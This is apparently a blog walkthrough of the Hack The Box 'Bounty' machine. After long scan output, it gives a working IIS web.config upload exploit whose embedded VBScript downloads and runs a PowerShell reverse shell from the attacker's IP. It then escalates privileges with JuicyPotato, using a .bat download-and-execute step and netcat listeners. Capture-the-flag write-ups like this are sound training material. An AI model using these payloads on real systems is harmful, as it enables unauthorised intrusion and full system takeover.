Bounty – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Bounty box from Hack The Box, done without using Metasploit.

1. Reconaissance

I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans at once:

./nmapAutomator.sh 10.10.10.39All

  • All = runs all the scans consecutively
  • Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.

Here are the results that come back:

root@kali:/home/churr0s/Scripts/nmapAutomator# ./nmapAutomator.sh 10.10.10.93 All

Running all scans on 10.10.10.93


---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:02 PDT
Mon Oct 12 19:02:59 2020 [htb] Inactivity timeout (--ping-restart), restarting
Mon Oct 12 19:02:59 2020 SIGUSR1[soft,ping-restart] received, process restarting
Mon Oct 12 19:02:59 2020 Restart pause, 5 second(s)
Mon Oct 12 19:03:04 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]185.77.152.22:1337
Mon Oct 12 19:03:04 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Mon Oct 12 19:03:04 2020 UDP link local: (not bound)
Mon Oct 12 19:03:04 2020 UDP link remote: [AF_INET]185.77.152.22:1337
Mon Oct 12 19:03:04 2020 TLS: Initial packet from [AF_INET]185.77.152.22:1337, sid=e44d09ba a2c1107b
Mon Oct 12 19:03:04 2020 VERIFY OK: depth=1, C=UK, ST=City, L=London, O=HackTheBox, CN=HackTheBox CA, name=htb, emailAddress=info@hackthebox.eu
Mon Oct 12 19:03:04 2020 VERIFY KU OK
Mon Oct 12 19:03:04 2020 Validating certificate extended key usage
Mon Oct 12 19:03:04 2020 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
Mon Oct 12 19:03:04 2020 VERIFY EKU OK
Mon Oct 12 19:03:04 2020 VERIFY OK: depth=0, C=UK, ST=City, L=London, O=HackTheBox, CN=htb, name=htb, emailAddress=info@hackthebox.eu
Mon Oct 12 19:03:04 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Mon Oct 12 19:03:04 2020 [htb] Peer Connection Initiated with [AF_INET]185.77.152.22:1337
Mon Oct 12 19:03:05 2020 SENT CONTROL [htb]: 'PUSH_REQUEST' (status=1)
Mon Oct 12 19:03:05 2020 PUSH: Received control message: 'PUSH_REPLY,route 10.10.10.0 255.255.255.0,route-ipv6 dead:beef::/64,tun-ipv6,route-gateway 10.10.14.1,topology subnet,ping 10,ping-restart 120,ifconfig-ipv6 dead:beef:2::1014/64 dead:beef:2::1,ifconfig 10.10.14.22 255.255.254.0,peer-id 8,cipher AES-256-GCM'
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: timers and/or timeouts modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: --ifconfig/up options modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: route options modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: route-related options modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: peer-id set
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: data channel crypto options modified
Mon Oct 12 19:03:05 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Mon Oct 12 19:03:05 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Mon Oct 12 19:03:05 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Mon Oct 12 19:03:05 2020 Preserving previous TUN/TAP instance: tun0
Mon Oct 12 19:03:05 2020 Initialization Sequence Completed
Nmap done: 1 IP address (1 host up) scanned in 101.76 seconds



---------------------Starting Nmap Basic Scan---------------------

No ports in quick scan.. Skipping!



----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:04 PDT
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 201.64 seconds



---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:07 PDT
Initiating Parallel DNS resolution of 1 host. at 19:07
Completed Parallel DNS resolution of 1 host. at 19:07, 0.05s elapsed
Initiating SYN Stealth Scan at 19:07
Scanning 10.10.10.93 [65535 ports]
Discovered open port 80/tcp on 10.10.10.93
SYN Stealth Scan Timing: About 11.47% done; ETC: 19:12 (0:03:59 remaining)
SYN Stealth Scan Timing: About 23.09% done; ETC: 19:11 (0:03:23 remaining)
SYN Stealth Scan Timing: About 34.25% done; ETC: 19:11 (0:02:55 remaining)
SYN Stealth Scan Timing: About 45.94% done; ETC: 19:11 (0:02:22 remaining)
SYN Stealth Scan Timing: About 57.06% done; ETC: 19:11 (0:01:54 remaining)
SYN Stealth Scan Timing: About 68.80% done; ETC: 19:11 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.22% done; ETC: 19:11 (0:00:52 remaining)
Completed SYN Stealth Scan at 19:11, 263.77s elapsed (65535 total ports)
Nmap scan report for 10.10.10.93
Host is up (0.087s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 263.91 seconds
           Raw packets sent: 131262 (5.776MB) | Rcvd: 785 (156.144KB)


Making a script scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:11 PDT
Nmap scan report for 10.10.10.93
Host is up (0.081s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds



---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:12 PDT
Nmap scan report for 10.10.10.93
Host is up (0.084s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds


Running Vuln scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:12 PDT
Nmap scan report for 10.10.10.93
Host is up (0.081s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635: 
|   VULNERABLE:
|   Remote Code Execution in HTTP.sys (MS15-034)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-1635
|       A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
|       caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
|       successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|           
|     Disclosure date: 2015-04-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
| vulners: 
|   cpe:/a:microsoft:iis:7.5: 
|     	SMNTC-56440	5.0	https://vulners.com/symantec/SMNTC-56440
|     	SMNTC-56439	2.1	https://vulners.com/symantec/SMNTC-56439
|     	SMNTC-43140	0.0	https://vulners.com/symantec/SMNTC-43140
|     	SMNTC-43138	0.0	https://vulners.com/symantec/SMNTC-43138
|_    	SMNTC-40573	0.0	https://vulners.com/symantec/SMNTC-40573
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 261.10 seconds



---------------------Recon Recommendations----------------------


Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.93:80 -o recon/gobuster_10.10.10.93_80.txt
nikto -host 10.10.10.93:80 | tee recon/nikto_10.10.10.93_80.txt





Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>

Running Default in (1) s:  


---------------------Running Recon Commands----------------------


Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93:80
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,asp,aspx,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/12 19:17:06 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2020/10/12 19:19:34 Finished
===============================================================

Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2020-10-12 19:19:35 (GMT-7)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-10-12 19:31:40 (GMT-7) (725 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Finished nikto scan

=========================



---------------------Finished all Nmap scans---------------------


Completed in 29 minute(s) and 15 second(s)

We have one port open so we’ll be using that to try to get into the box:

Port 80: running Microsoft IIS httpd 7.5

 

2. Enumeration

Visit the IP address in a browser:

Nothing helpful here so try viewing the page source to see if anything sticks out:

Nothing that seems to be helpful there either. During our scan, gobuster found two directories, aspnet_client and uploadedfiles. Both return errors.

Let’s try a stronger gobuster scan to see if we can find anything else:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -l -t 30 -e -k -x .asp,.aspx,.txt -u http://10.10.10.93:80 -o gobuster-medium.txt
  • dir: directory mode
  • -w: wordlist
  • -l: include length of the body in the output
  • -t: thread count
  • -e: expanded mode, print full urls
  • -k: skip ssl certificate verification
  • -u: url
  • -o: output file location
  • -x: file extensions to search for

And we get back an additional result: http://10.10.10.93:80/transfer.aspx (you will also get this result back when running a scan with dirsearch). Visiting this shows it is an upload form:

3. Initial foothold

Since we have a directory called /uploadedfiles and an upload form called transfer.aspx,we can assume that if we upload a file it will go to that directory. But trying to upload an .aspx or .asp file does not work. Neither does a .txt. However, trying a .png file works!

 

4. Exploit

One thing we can do to exploit an upload form on IIS is to upload a web.config file. This file is usually present in the root of the web directory and it contains certain options and configurations for the site. Here is what we need to do:

  1. Grab the Nishang repository and then copy the Invoke-PowerShellTcp.ps1 script over to your working directory
  2. Edit the copied version of the script, and add Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 7500 to the bottom. This triggers the command to auto-run instead of just loading modules to memory
  3. Open a new terminal window and open a listener with nc -lvnp 7500
  4. Open another new terminal window and start a python http server python -m SimpleHTTPServer 80
  5. Create the web.config file using the below code:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.22/Invoke-PowerShellTcp.ps1')")

Make sure to edit the bottom line to use your own attack box IP instead of 10.10.14.22

Now that we have the web.config file, upload it using the same upload form we used before. Once uploaded, you should be able to visit the location of the file to trigger the exploit:

And if the exploit works, you should now see a reverse shell spawned on your listener!

Running a whoami we can see we are a user called merlin, and we can grab that user’s flag. Note that you need to run a ls -force to see the hidden user.txt file:

Since we are not root though, we’ll need to do some privilege escalation to grab the root flag.

 

5. Privilege escalation

Let’s run a systeminfo to do some additional enumeration on this box and see what it tells us:

No hotfixes! That means we can probably use a wide array of exploits to choose from for privilege escalation. Let’s also run a whoami /priv:

We can see that merlin has eImpersonatePrivilege enabled, which means we can use JuicyPotato for privilege escalation. Here’s what we need to do:

  1. Grab the latest juicypotato release here and upload it to the merlin using(new-object net.webclient).downloadfile('http://10.10.14.22:80/jp.exe', 'C:\Users\merlin\Desktop\jp.exe')
    • I’m using port 80 because that’s the port I used to set up my simple http server earlier
  2. Run the executable to view what commands it takes (./jp.exe). We can see it takes the following commands:
    • -t: Create process call. Let’s use * to test both options
    • -p: The program to run. In our case we’re going to create a file that sends a reverse shell back to our attack machine
    • -l: COM server listen port. This can be anything so let’s use 4444
  3. Copy the nishang Invoke-PowerShellTcp.ps1 script over to your working directory again (give it a different name than the first one you copied over)
  4. Add this line to the end of the nishang script:Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.22 -Port 6666
    • Use your attack machine IP
    • the port will be a port number you use to open up a second listener
  5. Create a .bat file that will download our nishang shell script and run it. Put the following in the file: powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.22:80/shell-2.ps1')
    • use your attack machine’s IP
    • port 80 which is what we’re using for our simple http server
    • the name of your nishang script
  6. Now move the .bat file over to merlin:(new-object net.webclient).downloadfile('http://10.10.14.22:80/shell.bat', 'C:\Users\merlin\Desktop\shell.bat')
    • use your attack machine’s IP
    • port 80 which is what we’re using for our simple http server
    • path where you want to download it to on merlin
  7. Open up another terminal window and start a new listener using port 6666 (which is the port we added to the bottom of our nishang script)nc -nlvp 6666
  8. Then run the JuicyPotato executable from merlin, in the directory you downloaded the .bat and jp.exe files. Running this executable will try to get a token that impersonates SYSTEM. Then it will run the shell.bat file with elevated privileges and spawn a new reverse shell:PS C:\Users\merlin\Desktop> ./jp.exe -t * -p shell.bat -l 4444

And if all goes well, you’ll see a new reverse shell spawned on your second listener:

Running a whoami shows we are root, so grab the root flag!

Leave a Reply

Your email address will not be published. Required fields are marked *